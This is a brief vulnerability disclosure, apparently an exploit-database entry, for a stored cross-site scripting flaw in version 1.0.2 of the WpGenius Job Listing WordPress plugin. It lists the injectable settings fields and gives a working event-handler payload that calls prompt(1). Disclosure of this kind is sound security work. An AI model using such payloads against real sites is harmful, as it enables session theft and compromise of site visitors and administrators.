Exploit Title: WrodPress Plugin WpGenius Job Listing ——"Settings" Stored Cross-Site Scripting

Exploit Author: Thinkland Security Team

Vendor Homepage: https://wordpress.org/plugins/wpgenious-job-listing/

Version : V 1.0.2

Vulnerability Type: Stored Cross-Site Scripting

Tested on Windows 10 、XAMPP

Vulnerability proof：

Job Listing 》 Settings 》General》Default message for ( no job ) ,insert the xss payload "OnMoUsEoVeR=prompt(1)//
Job Listing 》 Settings 》E-mail notifications》Reply-To and Subject,insert the xss payload "OnMoUsEoVeR=prompt(1)//